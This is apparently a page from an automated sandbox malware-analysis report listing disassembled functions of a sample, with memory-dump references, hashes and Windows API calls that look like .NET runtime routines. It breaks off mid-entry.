                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                                                                                                                                                                                                  • String ID: Creation of WaitForGCEvent failed
                                                                                                                                                                                                                                  • API String ID: 133006248-2073067640
                                                                                                                                                                                                                                  • Opcode ID: 90160015fc6a4fbc39dded32f23d7fb88664e5d067279ed4b6ff92c114ef6361
                                                                                                                                                                                                                                  • Instruction ID: 041d11026c3702608a0c4ffa958de048448ae9c146af308dc601265f0b4f41a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90160015fc6a4fbc39dded32f23d7fb88664e5d067279ed4b6ff92c114ef6361
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28027C23E0DA4785FE94DB31A9512F92292AF44790F58453ADC0EC7392EE7FB448B319
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385EEA40 Relevance: .7, Instructions: 683COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f70da690df38cb77a9eebf6c1bbf438239b3850fbc342a8e413d422e42a12f72
                                                                                                                                                                                                                                  • Instruction ID: 36f3c82fa662cde94014df6f89a62829b5f73180982f4c680b9cec780e741c5d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f70da690df38cb77a9eebf6c1bbf438239b3850fbc342a8e413d422e42a12f72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF62A123A1974686EAA58F35E8403F9B691BF447D4F54A135D94EE3390DF3EF880A708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385FD210 Relevance: .7, Instructions: 663COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 20f45f77a24c16fd6a7f37d80dc3a39ff9f99164258b174c3fad209598ee19b2
                                                                                                                                                                                                                                  • Instruction ID: 6c55e5b5c6e15227d152ee03006e7b2fbd3c217e5e9015648f6f21cb950ca454
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f45f77a24c16fd6a7f37d80dc3a39ff9f99164258b174c3fad209598ee19b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5152E063E09B82C1EA948B35A8503F9A3E1BF947A4F145135E95EC77A0DF3EF055A308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F17B0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 62cf54ca29fee18739608754cee850365ff5bf89207bf3d3f8c84ddab51d855a
                                                                                                                                                                                                                                  • Instruction ID: 460bf2d261b0c0ab4cfbd728212574de10b9f5ad59fc531115be087e0b7b7842
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62cf54ca29fee18739608754cee850365ff5bf89207bf3d3f8c84ddab51d855a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A02A423D1CB4785FA92DB34A9412F56391AFA5390F449336D80DD63A2EF3E7494E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D4230 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                                                                                                                                                                                  • String ID: @$@$@
                                                                                                                                                                                                                                  • API String ID: 2645093340-1177533131
                                                                                                                                                                                                                                  • Opcode ID: 1c65b00883ed967979930eeee41b73e8f6308e2d047b5592fce0dff7bc0b8292
                                                                                                                                                                                                                                  • Instruction ID: 1f00ff9f84bd394c46f0064b756943306e5d42b386eedc49af3c6249a5cee0d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c65b00883ed967979930eeee41b73e8f6308e2d047b5592fce0dff7bc0b8292
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20513F32709AC185EBB18F25E4513EAB3A0FB88B61F444135CE9D93B88CF3DD5899B44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CC8A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC8AB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D46F0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D46F0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D473D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D46F0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4769
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D46F0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D477A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D46F0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4789
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC91A
                                                                                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6385CC92D
                                                                                                                                                                                                                                  • QueryInformationJobObject.KERNEL32 ref: 00007FF6385CC97E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                                                                                                                                                                                                                                  • String ID: PROCESSOR_COUNT
                                                                                                                                                                                                                                  • API String ID: 296690692-4048346908
                                                                                                                                                                                                                                  • Opcode ID: 3bf11e6d5e1439244a3bbbd96c361e4fb2391716feba360178e73559f0d6414a
                                                                                                                                                                                                                                  • Instruction ID: b6d75afa2fa8c288499f958a4196ddf3a371bc52feea933652defbcdf328bac2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bf11e6d5e1439244a3bbbd96c361e4fb2391716feba360178e73559f0d6414a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08316033E0864286EBD49B70D4403F963B2AF44B64F440135DA8ED3796DE2EF809EB08
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F2050 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 86 7ff6385f2050-7ff6385f207a call 7ff6385d4940 89 7ff6385f2085-7ff6385f208c 86->89 90 7ff6385f207c-7ff6385f2083 86->90 91 7ff6385f208e-7ff6385f2095 call 7ff6385d5760 89->91 92 7ff6385f20a2 89->92 90->91 91->92 98 7ff6385f2097-7ff6385f20a0 91->98 93 7ff6385f20a4-7ff6385f20d6 call 7ff6385d5f50 92->93 99 7ff6385f20e4-7ff6385f20eb 93->99 100 7ff6385f20d8-7ff6385f20df call 7ff6385d46d0 93->100 98->93 102 7ff6385f210e 99->102 103 7ff6385f20ed-7ff6385f20f4 99->103 100->99 105 7ff6385f2110-7ff6385f2141 call 7ff6385fd210 102->105 103->102 104 7ff6385f20f6-7ff6385f20fe call 7ff6385d5820 103->104 104->102 112 7ff6385f2100-7ff6385f2108 call 7ff6385d5830 104->112 110 7ff6385f235f 105->110 111 7ff6385f2147-7ff6385f214e 105->111 115 7ff6385f2364-7ff6385f2381 110->115 113 7ff6385f2185-7ff6385f218c 111->113 114 7ff6385f2150-7ff6385f2157 111->114 112->102 123 7ff6385f210a-7ff6385f210c 112->123 119 7ff6385f21a1 113->119 120 7ff6385f218e-7ff6385f219f 113->120 117 7ff6385f217e 114->117 118 7ff6385f2159-7ff6385f217c 114->118 117->113 118->113 122 7ff6385f21a7-7ff6385f21ea 119->122 120->119 120->122 124 7ff6385f21ec-7ff6385f21f8 122->124 125 7ff6385f21fa 122->125 123->105 124->125 126 7ff6385f2200-7ff6385f2246 call 7ff6385d5920 124->126 125->126 129 7ff6385f224e-7ff6385f229f call 7ff6385f1e40 call 7ff6385ef4b0 call 7ff6385d4a50 126->129 130 7ff6385f2248 126->130 137 7ff6385f22a5-7ff6385f22b3 129->137 138 7ff6385f2358 129->138 130->129 139 7ff6385f22b5-7ff6385f22cf EnterCriticalSection 137->139 140 7ff6385f2302-7ff6385f2315 call 7ff6385d4980 137->140 138->110 141 7ff6385f22d1-7ff6385f22dc 139->141 142 7ff6385f22de-7ff6385f22fd LeaveCriticalSection 139->142 147 7ff6385f2382-7ff6385f2407 140->147 148 7ff6385f2317-7ff6385f231e 140->148 141->142 144 7ff6385f2341-7ff6385f2348 LeaveCriticalSection 141->144 142->140 146 7ff6385f234d-7ff6385f2353 call 7ff6385d4a30 144->146 146->138 150 7ff6385f2415 147->150 151 7ff6385f2409-7ff6385f2413 147->151 148->146 152 7ff6385f2320-7ff6385f233a EnterCriticalSection 148->152 153 7ff6385f2418-7ff6385f2432 150->153 151->153 152->144 153->110 154 7ff6385f2438-7ff6385f245b call 7ff6385d58c0 153->154 157 7ff6385f246c-7ff6385f2472 154->157 158 7ff6385f245d-7ff6385f246a 154->158 159 7ff6385f2479-7ff6385f248c call 7ff6385d57c0 call 7ff638604be0 call 7ff6385f17b0 157->159 158->159 165 7ff6385f2491-7ff6385f2493 159->165 166 7ff6385f2495-7ff6385f24a1 call 7ff6385c7070 165->166 167 7ff6385f24a6-7ff6385f24a8 165->167 166->167 167->115
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D4940: VirtualAlloc.KERNELBASE ref: 00007FF6385D4956
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D4940: VirtualFree.KERNELBASE ref: 00007FF6385D496C
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22BC
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22FD
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F2327
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F2348
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeaveVirtual$AllocFree
                                                                                                                                                                                                                                  • String ID: PER_HEAP_ISOLATED data members initialization failed
                                                                                                                                                                                                                                  • API String ID: 1836396605-1705445303
                                                                                                                                                                                                                                  • Opcode ID: a3140103dbeb56138e99eed478704137ffa3015bd28a3af1f98f9f080676eeb0
                                                                                                                                                                                                                                  • Instruction ID: 4f2ceb8c2e9bb0138a6210da921fb8f0e8d68fc9447528a6c9fd5273022b2e46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3140103dbeb56138e99eed478704137ffa3015bd28a3af1f98f9f080676eeb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC125B3D0C682C6FAA09B31A9401F976E4AF50794F48153AE94CC67A5CF7FB148A71C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C6A90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162,?,?,?,?,?,00007FF6385C4B09), ref: 00007FF6385C6AD5
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162,?,?,?,?,?,00007FF6385C4B09), ref: 00007FF6385C6B01
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162), ref: 00007FF6385C6B3A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6385C6B26
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise$Sleep
                                                                                                                                                                                                                                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                                                                                                                                                                                                  • API String ID: 3706814929-926682358
                                                                                                                                                                                                                                  • Opcode ID: 5749bc9cef716ec383876975da61eedf7ec20a168ee9fac1d5e2c39cbc613279
                                                                                                                                                                                                                                  • Instruction ID: f0e6302e981dd2fbd2d28b9c30a19a4527d3cd1f174d75c37901b89ab64d7d91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5749bc9cef716ec383876975da61eedf7ec20a168ee9fac1d5e2c39cbc613279
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD212E33E0A68286EB949F35E9403F937E1AF04758F08513AD94EC2392DF3EE554AA44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CCB30 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                                                                                                                                                                                                  • String ID:
